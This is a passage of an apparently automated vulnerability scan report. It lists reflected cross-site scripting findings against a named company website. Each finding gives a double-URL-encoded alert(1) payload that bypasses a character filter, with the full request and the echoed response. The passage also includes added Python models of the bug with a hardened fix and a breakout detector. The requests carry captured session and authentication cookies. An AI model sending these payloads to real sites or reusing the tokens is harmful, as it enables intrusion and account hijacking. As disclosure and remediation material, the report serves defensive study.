bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib82d37";alert(1)//c015318ee36/labware/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.340. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d163%2522%253balert%25281%2529%252f%252f4421b1f2f32 was submitted in the REST URL parameter 3. This input was echoed as 2d163";alert(1)//4421b1f2f32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
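
The following is an added example, not code from this report, from the target site or from its server stack. It models the behaviour that the Issue detail and Remediation detail paragraphs describe, which are the same for findings 1.334 to 1.340: one percent-decode at the web server, a character blocklist that runs before a second, redundant decode in the application, and raw interpolation of the result into the cmCreateErrorTag("...") string literal of the 404 page. Beside it is a renderer that drops the second decode and escapes the value for a JavaScript string context, plus the narrow check the scanner's "Certain" confidence rests on. The payload, request path and 404 fragment are copied from finding 1.334; the blocklist, the handler and function names, and the exact location of each decode are assumptions.

```python
# Added example (not code from the XSS.CX report or from the site it describes):
# a model of the decode chain and script-context echo reported for findings
# 1.334 to 1.340, beside a hardened renderer. Payload, path and the 404
# fragment come from the report; the filter, handler names and the decode
# locations are assumptions.
import re
from urllib.parse import unquote

# Payload of finding 1.334 exactly as sent on the wire (double URL-encoded),
# and the same payload encoded once, which the inferred blocklist should catch.
DOUBLE_ENCODED = "83254%2522%253balert%25281%2529%252f%252fcf3dc4590d"
SINGLE_ENCODED = "83254%22%3balert%281%29%2f%2fcf3dc4590d"
MARKER = "alert(1)//cf3dc4590d"
ORIGIN = "http://www.sigmaaldrich.com:4402"


def request_path(payload: str) -> str:
    """REST URL parameter 2 is the 'medialib' segment, as in the report's request line."""
    return f"/etc/medialib{payload}/labware/labware-icons/air-sensitive-handling"


def web_server_decode(raw_path: str) -> str:
    """First decode: the HTTP server percent-decodes the path before dispatching it."""
    return unquote(raw_path)


def blocklist_ok(path: str) -> bool:
    """The kind of character blocklist the report infers (assumed). It inspects the
    once-decoded path, so a double-encoded quote is still '%22' here and passes."""
    return not any(c in path for c in '"\'<>')


def js_string_literal(value: str) -> str:
    """Output encoding for a JS string literal inside <script>: \\uXXXX-escape quotes,
    backslashes, control characters, '<' '>' '/' '&' (so '</script>' cannot close
    the block) and the U+2028/U+2029 line terminators that JS treats as newlines."""
    risky = set('"\'\\<>/&\u2028\u2029')
    body = "".join(f"\\u{ord(c):04x}" if c in risky or ord(c) < 0x20 else c
                   for c in value)
    return '"' + body + '"'


def render_404(display_url: str, escape: bool) -> str:
    """The 404 fragment seen in the report, with the URL either interpolated raw
    (the observed behaviour) or emitted as an escaped JS literal."""
    text = "Error 404 | " + display_url
    literal = js_string_literal(text) if escape else f'"{text}"'
    return ('<script language="JavaScript1.1">\n'
            f'       cmCreateErrorTag({literal},"E404") ;\n'
            '   </script>')


def vulnerable_handler(raw_path: str) -> str:
    """Models the observed pipeline: validate, then decode a second time, then echo."""
    once = web_server_decode(raw_path)
    if not blocklist_ok(once):
        return "HTTP/1.1 400 Bad Request"
    twice = unquote(once)  # redundant second decode, after validation: the bug
    return render_404(ORIGIN + twice, escape=False)


def fixed_handler(raw_path: str) -> str:
    """No second decode, and output encoding in place of an input blocklist."""
    once = web_server_decode(raw_path)
    return render_404(ORIGIN + once, escape=True)


_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S)


def script_breakout(html: str, marker: str) -> bool:
    """The evidence the scanner reports: inside a <script> block, the echo appears
    as a closed string literal followed by the injected statement."""
    return any(f'";{marker}' in body for body in _SCRIPT.findall(html))


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler), ("fixed", fixed_handler)):
        for label, payload in (("double", DOUBLE_ENCODED), ("single", SINGLE_ENCODED)):
            out = handler(request_path(payload))
            print(f"{name:10s} {label:6s} breakout={script_breakout(out, MARKER)}")
            print("  " + out.replace("\n", "\n  "))
```

Running the module prints both renderings for both payloads: the vulnerable handler rejects the single-encoded payload but reproduces the exact cmCreateErrorTag line shown in the report's response for the double-encoded one, while the fixed handler never closes the literal. json.dumps would be a tempting shortcut for the escaping, but it leaves <, > and / alone, so a value containing </script> would still terminate the block; the escaper above covers that case. The check in script_breakout is deliberately narrow: it looks for the same evidence the scanner reports, a closed literal followed by the injected statement, rather than attempting to parse JavaScript.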

Request

GET /etc/medialib/labware2d163%2522%253balert%25281%2529%252f%252f4421b1f2f32/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware2d163";alert(1)//4421b1f2f32/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.341. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9d85%2522%253balert%25281%2529%252f%252f61a9fd1d838 was submitted in the REST URL parameter 4. This input was echoed as b9d85";alert(1)//61a9fd1d838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.
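The remediation above, and the identical findings 1.342 to 1.347 that follow, all describe one mechanism: a character filter that runs before a second URL-decode, with the result concatenated unescaped into a double-quoted JavaScript string. The Python model below is an added example and is not code from the scanned application or from the scanner report; the blacklist, the host prefix http://www.example.test and all function names are assumptions chosen to reproduce the observed behaviour. It shows why the double-encoded payload from finding 1.341 passes the filter and terminates the string, how a pipeline that decodes once and then encodes for the JavaScript string context neutralises the same input (including a "</script>" break-out), and a check that detects the string break-out in a response body of the kind shown in this report.

```python
"""
Model of the double-URL-decoding XSS reported in finding 1.341 and a hardened
rendering pipeline. Added example only; the blacklist, the host prefix and the
function names are assumptions, not the scanned application's code.
"""
import json
import re
from urllib.parse import unquote

# Request path from finding 1.341 (double-encoded: %2522 -> %22 -> ")
FINDING_1_341_PATH = ("/etc/medialib/labware/labware-icons"
                      "b9d85%2522%253balert%25281%2529%252f%252f61a9fd1d838"
                      "/books-and-software")
HOST_PREFIX = "http://www.example.test"   # assumption; the report shows the real host
BLOCKED = '<>"\'();'                       # assumed blacklist enforced by the filter


def filter_passes(value: str) -> bool:
    """Assumed blacklist check: reject the value if any listed character is present."""
    return not any(ch in value for ch in BLOCKED)


def render_error_tag(message: str) -> str:
    """Insecure concatenation into a double-quoted JavaScript string, as in the response."""
    return '<script>cmCreateErrorTag("' + message + '","E404");</script>'


def vulnerable_render(raw_path: str) -> str:
    """Models the observed behaviour.

    1. The web server URL-decodes the request path once (%2522 becomes %22).
    2. The filter inspects that once-decoded value: a literal quote is blocked,
       but the still-encoded %22 is not.
    3. The application decodes a second time (%22 becomes ") and concatenates
       the result into the script without any JavaScript-string encoding.
    """
    once = unquote(raw_path)
    if not filter_passes(once):
        return render_error_tag("Error 404 | blocked")
    twice = unquote(once)
    return render_error_tag("Error 404 | " + HOST_PREFIX + twice)


def js_string_literal(value: str) -> str:
    """Encode a value for a JavaScript string context inside an HTML <script> block.

    json.dumps escapes backslashes, quotes and control characters and, with
    ensure_ascii, the U+2028/U+2029 line terminators; "</" is escaped as well so
    the HTML parser cannot see a premature </script>.
    """
    return json.dumps(value, ensure_ascii=True).replace("</", "<\\/")


def hardened_render(raw_path: str) -> str:
    """Decode exactly once, validate the canonical form, then output-encode."""
    once = unquote(raw_path)   # the web server's single decode; no second unquote
    # Input validation, if any, belongs here, on `once`, the canonical value.
    message = "Error 404 | " + HOST_PREFIX + once
    return "<script>cmCreateErrorTag(" + js_string_literal(message) + ',"E404");</script>'


_CALL = re.compile(r'cmCreateErrorTag\(\s*(.*?)\s*,\s*"E404"\s*\)', re.S)


def breaks_out_of_js_string(html: str) -> bool:
    """Confirmation check for this class of finding: True when the first argument of
    cmCreateErrorTag is no longer a single well-formed string literal, i.e. the
    reflected input terminated the string (b9d85";alert(1)//...)."""
    match = _CALL.search(html)
    if match is None:
        return False
    try:
        json.loads(match.group(1))   # a JSON string literal is a valid JS string literal
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(vulnerable_render(FINDING_1_341_PATH))
    print(breaks_out_of_js_string(vulnerable_render(FINDING_1_341_PATH)))
    print(hardened_render(FINDING_1_341_PATH))
    print(breaks_out_of_js_string(hardened_render(FINDING_1_341_PATH)))
```

The check is deliberately structural rather than a search for "alert(1)": any response in which the string argument no longer parses as one literal has been broken out of, whatever the canary was, so the same function can be run over the redirected 404 bodies captured for the other parameters in this series.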

Request

GET /etc/medialib/labware/labware-iconsb9d85%2522%253balert%25281%2529%252f%252f61a9fd1d838/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:07 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsb9d85";alert(1)//61a9fd1d838/books-and-software","E404") ;
   </script>
...[SNIP]...

1.342. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2da6%2522%253balert%25281%2529%252f%252f2dc33b618cd was submitted in the REST URL parameter 5. This input was echoed as f2da6";alert(1)//2dc33b618cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.

Request

GET /etc/medialib/labware/labware-icons/books-and-softwaref2da6%2522%253balert%25281%2529%252f%252f2dc33b618cd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:09 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/books-and-softwaref2da6";alert(1)//2dc33b618cd","E404") ;
   </script>
...[SNIP]...

1.343. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8977b%2522%253balert%25281%2529%252f%252f9f89e2c44cf was submitted in the REST URL parameter 1. This input was echoed as 8977b";alert(1)//9f89e2c44cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.

Request

GET /etc8977b%2522%253balert%25281%2529%252f%252f9f89e2c44cf/medialib/labware/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
